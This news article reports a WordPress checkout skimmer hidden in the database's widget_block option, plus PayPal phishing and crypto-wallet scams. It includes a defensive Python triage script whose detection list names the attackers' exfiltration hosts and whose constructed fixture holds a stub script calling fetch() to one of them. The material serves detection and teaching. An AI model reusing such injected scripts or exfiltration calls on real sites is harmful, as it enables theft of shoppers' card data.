Cybersecurity researchers have issued a warning about a new and stealthy credit card skimming campaign targeting checkout pages on WordPress sites. The attackers inject malicious JavaScript directly into the database of the content management system (CMS) rather than into its files.
The security firm Sucuri revealed that the malware embeds its JavaScript in the wp_options table, inside the widget_block option, which lets it evade security scanners and maintain stealth. The attack is activated exclusively on checkout pages, where it intercepts data from existing input fields or injects a fraudulent payment form.
This code determines whether the current page is a checkout page and, upon entry of payment details, generates a fake payment screen that mimics processing services like Stripe. The primary objective is to steal card numbers, expiration dates, CVV codes, and other sensitive payment information.
The data captured by the malicious code is encrypted with AES-CBC and then Base64-encoded to obfuscate its contents, before being transmitted to attacker-controlled servers such as “valhafather[.]xyz” and “fqbe23[.]xyz”.
This campaign is reminiscent of a previously identified scheme in which JavaScript was used to create fake forms or intercept data on genuine payment pages. In that scheme the stolen information passed through three layers of obfuscation: JSON serialization, XOR with a key embedded in the script, and Base64 encoding.
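As an added defensive example (not code from the Sucuri report or from this article), the Python triage below pulls each widget's HTML out of a PHP-serialized widget_block value, as stored in wp_options, and flags the indicators described above. The indicator patterns and the sample rows are constructed for this example; only the two exfiltration hosts come from the report.

```python
import re

# Hosts named in the Sucuri report (undefanged so they match live data);
# every other indicator below is a heuristic constructed for this example.
KNOWN_EXFIL_HOSTS = ("valhafather.xyz", "fqbe23.xyz")
INDICATORS = {
    "inline_script": re.compile(r"<script\b", re.I),
    "checkout_targeting": re.compile(r"checkout", re.I),
    "base64_helpers": re.compile(r"\b(?:atob|btoa)\s*\(", re.I),
    "aes_cbc": re.compile(r"AES-CBC|CryptoJS\.AES", re.I),
}
# One block widget in a serialized widget_block value: i:<idx>;a:1:{s:7:"content";s:<bytes>:"<html>";}
WIDGET_RX = re.compile(r'i:(\d+);a:\d+:\{s:7:"content";s:(\d+):"')


def extract_block_widgets(option_value: str) -> dict:
    """Map widget index -> HTML, slicing by the declared byte length so quotes in the HTML are safe."""
    widgets = {}
    for m in WIDGET_RX.finditer(option_value):
        start = len(option_value[:m.end()].encode())
        idx, length = int(m.group(1)), int(m.group(2))
        widgets[idx] = option_value.encode()[start:start + length].decode(errors="replace")
    return widgets


def verdict(html: str) -> str:
    """Any <script> in a block widget deserves review; script plus checkout logic or
    crypto helpers, or a known exfiltration host anywhere, is treated as a skimmer."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    if any(host in html for host in KNOWN_EXFIL_HOSTS):
        return "malicious"
    if not hits["inline_script"]:
        return "clean"
    strong = hits["checkout_targeting"] or hits["aes_cbc"] or hits["base64_helpers"]
    return "likely_skimmer" if strong else "review"


def triage_widget_block(option_value: str) -> dict:
    """Return {widget_index: verdict} for every widget that is not clean."""
    return {idx: v for idx, html in extract_block_widgets(option_value).items()
            if (v := verdict(html)) != "clean"}


def serialize_widget_block(widgets: dict) -> str:
    """Build a widget_block value in WordPress's layout (constructed test helper)."""
    body = "".join(f'i:{i};a:1:{{s:7:"content";s:{len(h.encode())}:"{h}";}}'
                   for i, h in widgets.items())
    return f'a:{len(widgets) + 1}:{{{body}s:12:"_multiwidget";i:1;}}'


# Constructed sample: an ordinary HTML widget plus an injected one shaped like the campaign above.
BENIGN_HTML = "<p>Free shipping on orders over $50</p>"
SKIMMER_HTML = ('<!-- wp:html --><script>if(location.pathname.includes("checkout")){'
                '/* skimmer body omitted: fake form, AES-CBC, btoa(), POST */'
                'fetch("https://valhafather.xyz/")}</script><!-- /wp:html -->')
SAMPLE_OPTION = serialize_widget_block({2: BENIGN_HTML, 3: SKIMMER_HTML})
```

Run it against the real value with SELECT option_value FROM wp_options WHERE option_name = 'widget_block'; anything other than "clean" warrants comparing the widget against what the site owner actually configured.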
Meanwhile, Fortinet specialists reported a phishing campaign disguised as a PayPal payment request for approximately $2,200. Using a test domain linked to Microsoft 365, attackers create a mailing list to send emails from a legitimate PayPal address, bypassing security systems. Victims who enter their login credentials unknowingly link their PayPal accounts to the attackers’ addresses, granting them full account control.
Additionally, threat actors have adopted a novel cryptocurrency theft method based on data manipulation during transaction simulations. This technique involves creating counterfeit sites that mimic decentralized applications (DApps) to steal funds from wallets.
Scam Sniffer noted that this attack represents a significant evolution in phishing tactics, as adversaries exploit trusted wallet functions that were previously considered secure, making detection considerably more challenging.